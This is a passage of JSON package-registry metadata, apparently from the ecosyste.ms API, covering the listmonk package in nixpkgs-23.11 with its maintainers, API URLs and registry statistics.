756098,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":21,"past_year_merged_pull_requests_count":24,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/listmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/listmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/listmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/listmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/listmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/listmonk/codemeta","maintainers":[{"uuid":"RaitoBezarius","login":null,"name":"Ryan Lahfa","email":"ryan@lahfa.xyz","url":"https://github.com/RaitoBezarius","packages_count":329,"html_url":null,"role":null,"created_at":"2026-03-08T02:47:29.855Z","updated_at":"2026-03-08T02:47:29.855Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/RaitoBezarius/packages"}],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":3383},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-09-01T05:05:08.463Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}}]